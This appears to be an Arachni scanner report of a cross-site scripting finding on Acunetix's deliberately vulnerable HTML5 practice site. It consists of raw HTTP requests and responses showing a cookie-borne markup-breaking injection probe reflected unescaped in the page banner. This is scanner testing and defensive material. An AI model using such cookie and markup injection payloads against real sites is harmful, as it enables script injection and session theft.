GET /logout HTTP/1.1 Host: testhtml5.vulnweb.com Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7 Cookie: username=admin
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 302 FOUND Server: nginx/1.4.1 Date: Mon, 26 Jan 1970 07:00:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 209 Connection: keep-alive Location: http://testhtml5.vulnweb.com/ Set-Cookie: username=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to target URL: <a href="/">/</a>. If not click the link.
cookie
input
username
using
GET
at
http://testhtml5.vulnweb.com/login
pointing to
http://testhtml5.vulnweb.com/
.
0 | username=admin; Path=/ |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie |
http://testhtml5.vulnweb.com/login | http://testhtml5.vulnweb.com/ |
|
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Host: testhtml5.vulnweb.com Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7 Cookie: username=admin</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea>
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:58:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>admin</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea></b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<!-- App libs -->
<script src="/static/app/app.js"></script>
<script src="/static/app/libs/sessvars.js"></script>
<script src="/static/app/post.js"></script>
<script src="/static/app/controllers/controllers.js"></script>
<script src="/static/app/services/itemsService.js"></script>
<script src="http://bxss.s3.amazonaws.com/ad.js"></script>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
||
| 6 | 0.800369 | click |
<a href="#/archive" data-arachni-id="916551842">
|
|
||
| 7 | 0.355032 | request |
http://testhtml5.vulnweb.com/static/app/partials/archive.html |
|
||
| 8 | 0.250829 | request |
http://testhtml5.vulnweb.com/ajax/archive |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Cache-Control: no-cache Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="55824100"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class=""><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li class="active"><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> Showing last <b>50</b> items </div> </div> <!-- ngRepeat: item in items | filter:searchText --><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> blog.github.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> ssd.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> www.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> twitter.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> <hr> </div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>2</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 